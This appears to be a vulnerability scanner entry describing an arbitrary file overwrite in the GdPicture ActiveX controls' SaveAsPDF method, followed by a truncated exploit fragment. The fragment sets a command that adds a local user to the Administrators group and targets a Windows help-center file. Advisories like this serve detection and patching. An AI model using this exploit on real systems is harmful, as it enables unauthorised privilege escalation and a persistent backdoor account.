GdPicture Multiple ActiveX Control SaveAsPDF Method Arbitrary File Overwrite

The remote host contains the GdPicturePro5S.Imaging or GdPicture4S.Imaging ActiveX control, which is used to manipulate images in a variety of formats. The version of the control installed on the remote host reportedly fails to validate input to the 'sFilePath' argument of the 'SaveAsPDF' method...

gdpicture-exec.txt

var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x42\x00\x0...